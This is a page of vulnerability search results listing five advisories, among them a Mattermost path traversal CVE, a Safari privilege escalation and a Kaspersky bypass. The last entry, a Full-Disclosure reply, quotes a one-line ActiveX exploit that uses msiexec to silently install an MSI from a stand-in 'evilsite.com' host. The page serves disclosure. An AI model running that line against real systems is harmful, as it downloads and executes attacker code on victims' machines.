5 matches found
CVE-2026-4858 Path traversal in integration action URL leading to arbitrary API execution via system admin’s auth token.
Mattermost versions 11.6.x = 11.6.0, 11.5.x = 11.5.3, 11.4.x = 11.4.4, 10.11.x = 10.11.14 fail to check the integration URL for path traversal, which allows a malicious authenticated user to call an arbitrary API via the system admin Mattermost auth token using path traversal in integration action...
(Pwn2Own) Apple Safari Symbolic Link Arbitrary Application Execution Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Apple Safari. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of symboli...
PT-2017-04: Security Restrictions Bypass in Kaspersky Embedded Systems Security
The specialists of the Positive Research center have detected a Security Restrictions Bypass vulnerability in Kaspersky Embedded Systems Security. Vulnerability in the Application Control component of Kaspersky Embedded Systems Security allows attackers to gain privileges and execute arbitrary...
Interactive Studio GamePort 3.0/3.1/4.0 Arbitrary application execution
No description provided by source. source: http://www.securityfocus.com/bid/12006/info Gameport is reported prone to multiple vulnerabilities in the client and server. These issues may allow an attacker to gain unauthorized access to a vulnerable server and execute arbitrary code on a vulnerable...
Re: [Full-disclosure] Gateway WebLaunch ActiveX Control Insecure Method
I was playing with this a bit more. Everybody has the Windows Installer installed, right? How about this: obj.DoWebLaunch"","........windowssystem32msiexec.exe", "","/i http://www.evilsite.com/evilapp.msi /quiet"; Elazar On Tue, 08 Jan 2008 20:08:53 -0500 [email protected] wrote: The DoWebLaunc...